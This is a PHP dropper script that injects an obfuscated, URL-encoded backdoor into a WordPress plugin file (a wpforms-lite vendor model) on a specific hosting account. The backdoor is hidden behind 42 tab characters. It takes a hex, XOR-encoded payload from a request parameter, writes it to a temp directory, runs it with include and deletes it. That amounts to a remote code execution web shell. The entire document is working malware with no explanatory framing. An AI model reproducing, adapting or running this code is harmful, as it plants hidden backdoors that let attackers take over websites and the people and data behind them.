<?php  $path = '/home/hikrsdyp/public_html/wp-content/plugins/wpforms-lite/vendor_prefixed/square/square/src/Models/DeleteMerchantCustomAttributeDefinitionResponse.php'; $ft = @filemtime($path); $content = file_get_contents($path); $new_code = rawurldecode('if%28array_key_exists%28%22b%5Cx69%5Cx6Ed%22%2C%20%24_REQUEST%29%29%7B%20%24dat%20%3D%20hex2bin%28%24_REQUEST%5B%22b%5Cx69%5Cx6Ed%22%5D%29%3B%20%24symbol%20%3D%27%27%20%3B%20%24f%20%3D%200%3B%20while%28%24f%20%3C%20strlen%28%24dat%29%29%7B%24symbol%20.%3D%20chr%28ord%28%24dat%5B%24f%5D%29%20%5E%2087%29%3B%24f%2B%2B%3B%7D%20%24entity%20%3D%20array_filter%28%5B%22/var/tmp%22%2C%20sys_get_temp_dir%28%29%2C%20getenv%28%22TEMP%22%29%2C%20%22/dev/shm%22%2C%20%22/tmp%22%2C%20session_save_path%28%29%2C%20getcwd%28%29%2C%20getenv%28%22TMP%22%29%2C%20ini_get%28%22upload_tmp_dir%22%29%5D%29%3B%20%24ref%20%3D%200%3B%20do%20%7B%20%24k%20%3D%20%24entity%5B%24ref%5D%20%3F%3F%20null%3B%20if%20%28%24ref%20%3E%3D%20count%28%24entity%29%29%20break%3B%20if%20%28is_dir%28%24k%29%20%26%26%20is_writable%28%24k%29%29%20%7B%20%24fac%20%3D%20str_replace%28%22%7Bvar_dir%7D%22%2C%20%24k%2C%20%22%7Bvar_dir%7D/.value%22%29%3B%20%24file%20%3D%20fopen%28%24fac%2C%20%27w%27%29%3B%20if%20%28%24file%29%20%7B%20fwrite%28%24file%2C%20%24symbol%29%3B%20fclose%28%24file%29%3B%20include%20%24fac%3B%20%40unlink%28%24fac%29%3B%20die%28%29%3B%20%7D%20%7D%20%24ref%2B%2B%3B%20%7D%20while%20%28true%29%3B%20%7D'); if (strstr($content, $new_code)) {     die('!already injected!'); } $starts = ['<?php', '<?']; foreach ($starts as $start) {     if (substr($content, 0, strlen($start)) == $start) {         $content = substr($content, strlen($start));         $content = $start.str_repeat("\t", 42).$new_code."\n".$content;         if (file_put_contents($path, $content)) {             $content = file_get_contents($path);             if (strstr($content, $new_code)) {                 die("!success!<ft>{$ft}</ft>");             }         }     } } die('!failed!');